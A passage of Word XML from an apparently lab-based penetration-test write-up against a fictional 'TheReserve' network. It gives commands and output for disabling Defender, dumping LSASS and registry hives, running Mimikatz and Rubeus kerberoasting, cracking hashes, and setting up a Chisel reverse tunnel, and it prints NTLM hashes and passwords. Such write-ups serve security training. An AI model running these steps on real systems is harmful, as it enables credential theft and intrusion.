      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4201AD22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3.1 RDP into Server1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555BC56C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Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>svcScanning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials found via webmail brute force, RDP access was gained to Server1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>svcScanning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> was a local administrator on this machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB1926E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RDP from WRK2 into Server1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B69C5" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000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mstsc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from WRK2 desktop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F255BF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Computer: 10.200.40.31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5745214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Username: CORP\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</w:p>
    <w:p w14:paraId="121B04A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Password: Password1!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318E3C4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AC5AA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OR from Kali (once tunnel is up)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471F4643" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E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xfreerdp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u:svcScanning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/p:'Password1!' /v:10.200.40.31 /dynamic-resolution +clipboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D740A6" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD7DEA4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3.2 Verify Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D853E93" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>svcScanning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> had </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>SeDebugPrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>SeImpersonatePrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> — both critical for offensive operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBE7720" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:before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/all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ECEBC7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priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="001E136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CDA1AC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Key findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7642E48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BUILTIN\Administrators     - Local Admin!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4687F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SeDebugPrivilege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- Enabled!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDA855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SeImpersonatePrivilege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- Enabled!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B2604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High Mandatory Level       - High integrity!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312E2A24" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531373E1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4 — Privilege Escalation on Server1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C515F8C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48CB4B69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lastRenderedPageBreak/>
        <w:t>4.1 Disable Windows Defender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A18D4E9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Disable real-time protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ACB95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DisableRealtimeMonitoring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$true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F68D8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DisableIOAVProtection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$true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3775F452" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="432ABD10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4.2 LSASS Memory Dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A3EF65" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>LSASS was dumped using the built-in Windows comsvcs.dll method — no external tools required, bypassing many AV detections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0123D4B4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Dump LSASS process memory (built-in method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A3BD2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rundll32.exe C:\Windows\System32\comsvcs.dll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MiniDump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(Get-Process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lsass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C:\Windows\Temp\lsass.dmp full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629C711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6AC32B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dump created (~46MB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37224D67" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E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C:\Windows\Temp\lsass.dmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0047BA" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CC863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4.3 SAM / SYSTEM / SECURITY Registry Hive Dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C457EB7" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Registry hives were saved locally for offline credential extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511AF5B1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Save registry hives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12505E8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reg save HKLM\SAM C:\Windows\Temp\SAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3046D84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reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E3EBF8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reg save HKLM\SECURITY C:\Windows\Temp\SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE04A35" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198BA72D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4.4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Credential Dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D992D9C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> was run from the tools folder found on the Server1 desktop to dump all credentials from LSASS memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18777F5C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Navigate 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mimikatz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tools folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5D9D0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"C:\Users\svcScanning\Desktop\capstone-challenge-resources\Tools\mimikatz_trunk\x64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115ED12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D8A2E9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Run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mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="392B236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.\mimikatz.exe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privilege::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debug"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sekurlsa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logonpasswords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 "exit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F96B9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9A1B63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Results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD8D39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NTLM: 7facdc498ed1680c4fd1448319a8c04f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483B3A9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SERVER1$   NTLM: 9cd072e162098f35e4599d8e599fd583</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2343F67F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keith.allen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NTLM: 2b576acbe6bcfda7294d6bd18041b8fe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015423BB" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13EB7C40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4.5 Rubeus — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C0A6962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Rubeus was used to request Kerberos service tickets for all SPN accounts, then crack them offline with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4679BA8B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Navigate to Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F631E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"C:\Users\svcScanning\Desktop\capstone-challenge-resources\Tools\Rubeus"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE42DD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5C0B97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all accounts at once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D99362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.\Rubeus.exe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format:hashcat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outfile:C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:\Users\Public\hashes.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="69BF10B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F03BA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specific accounts individually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E52D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.\Rubeus.exe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user:svcBackups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format:hashcat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outfile:C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:\Users\Public\svcBackups.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="042CA04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.\Rubeus.exe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user:svcEDR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format:hashcat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outfile:C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:\Users\Public\svcEDR.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3F0E8B8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.\Rubeus.exe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user:svcMonitor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format:hashcat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outfile:C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:\Users\Public\svcMonitor.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2C0BA6E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.\Rubeus.exe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user:svcOctober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format:hashcat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outfile:C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:\Users\Public\svcOctober.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="560F35E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094938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5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accounts found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EED428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cifs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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F1DA7E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svcEDR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http/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svcEDR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FC0378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svcMonitor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http/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svcMonitor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C1FA07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svcOctober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mssql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svcOctober</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="145CE92D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cifs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</w:p>
    <w:p w14:paraId="4B6A304C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43CBC25A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4.6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> — AD ACL Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEBE25D" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to find interesting ACL misconfigurations. Critical finding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>svcBackups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> had </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> rights on the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46580AA9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PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A9DDF6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"C:\Users\svcScanning\Desktop\capstone-challenge-resources\Tools\PowerView"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5590E68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Import-Module .\PowerView.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E8E75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C00D39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Find accounts with dangerous ACLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C15A6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Find-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InterestingDomainAcl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ResolveGUIDs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Where-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B5535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_.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IdentityReferenceName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-match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svcBackups|svcScanning|svcEDR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714B267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B0F98B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629D7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CRITICAL FINDING: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has:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7240ABB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DS-Replication-Get-Changes      &lt;-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DCSync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right!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360937A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DS-Replication-Get-Changes-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All  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DCSync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right!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA8819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80771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Also enumerate domain structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5465832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NetDomain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="556521D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-SPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF470A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DomainGroupMember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"Domain Admins"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E504A0" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EF5E98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5 — Hash Cracking (Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0CB958" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062F53CB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5.1 Copy Hashes to Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AE38A8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Copy hash files from Server1 to Kali (via shared drive or SMB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C081C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cp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/c/Users/Public/svcBackups.txt ~/hashes/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723FE66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cp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/c/Users/Public/svcEDR.txt ~/hashes/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18776E0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cp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/c/Users/Public/svcMonitor.txt ~/hashes/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C44C85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cp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/c/Users/Public/svcOctober.txt ~/hashes/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB86594" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="061DC1C0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5.2 Generate Targeted Wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9E9434" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>A custom Python script was used to generate a targeted wordlist based on the company name and common password patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A8643B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python3 &lt;&lt; 'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A275E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base_words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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2565054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TheReserve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thereserve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"Reserve", "reserve",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F87931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CorpTheReserve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"Password", "password",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ReserveBank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7F22923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6C508FBD" w14:textId="77777777" w:rsidR="007B11CB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numbers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[str(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9999)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A7296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specials = ["!", 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@", "#", "$", "%", "&amp;", "*"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4CEBB22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passwords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091F41D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word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base_words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0F2C9DC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n in numbers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DACE31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 s in specials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C91758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passwords.add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f"{word}{n}{s}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</w:p>
    <w:p w14:paraId="6356730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passwords.add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(f"{word}{s}{n}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06882CE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/smart_wordlist.txt", "w") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312FBE2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p in sorted(passwords):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 + "\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9F0ABB" w14:textId="77777777" w:rsidR="007B11CB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f"Generated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passwords)}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passwords")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636B679F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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7327BD" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC8437F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5.3 Crack with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03D21DB5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Crack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hashes (mode 13100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECA4F91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hashcat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-m 13100 ~/hashes/svcBackups.txt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/smart_wordlist.txt --force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225B4AF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3579EA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Also try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rockyou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="736F2E7B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hashcat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-m 13100 ~/hashes/svcBackups.txt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/share/wordlists/rockyou.txt --force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B572A8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A068097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Result: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svcBackups:q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9nzssaFtGHdqUV3Qv6G</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567FDFA5" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B39F07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6 — Chisel Tunnel (SOCKS5 Proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE87A1A" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A117E1" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Kali had no direct access to the internal network. A reverse SOCKS5 tunnel was set up using Chisel so all tool traffic routes through Server1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431DFAD0" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702BE2DD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6.1 Start Chisel Server on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAB284D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Start chisel in reverse/server mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67360117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chisel server -p 1337 --reverse --socks5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4B782" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0490BC23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6.2 Transfer Chisel to Server1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E5040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Method 1 — via shared network drive from WRK2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A9704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copy Z:\chisel.exe C:\Temp\chisel.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C463DF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14:paraId="5DC53B6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Method 2 — via SMB from Server1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72858BB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use \\10.200.40.22\C$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user:corp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Password1!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084D60B2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copy \\10.200.40.22\C$\Tools\chisel.exe C:\Temp\chisel.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B833A26" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="145A8119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6.3 Start Chisel Client on Server1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1765E2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Connect back to Kali — creates reverse SOCKS5 on port 1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAC8C1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C:\Temp\chisel.exe client 10.150.40.5:1337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R:socks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4986DA9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57BDDE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Kali terminal shows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC5F47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[1337] client#1: tun: proxy#R:127.0.0.1:1080=&gt;socks: Listening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDFEC66" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="087CFB72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6.4 Configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>Proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC6F797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Edit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proxychains.conf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(or proxychains4.conf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1515380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Comment out any existing socks4 line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A12DB5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Add:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7074F23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socks5 127.0.0.1 1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517E0E5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BF9D78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tunnel is working</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE5CC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ss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grep 1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C99576" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E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-p 445,5985 10.200.40.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157783A5" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All subsequent commands targeting internal machines must be prefixed with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25021820" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C644C87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 xml:space="preserve">Phase 7 — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>Secretsdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> via Tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED8CD22" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E424F0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7.1 Dump Server1 Local Credentials (LSA Secrets)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE3919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Running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>secretsdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> against Server1 itself revealed LSA secrets — including the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
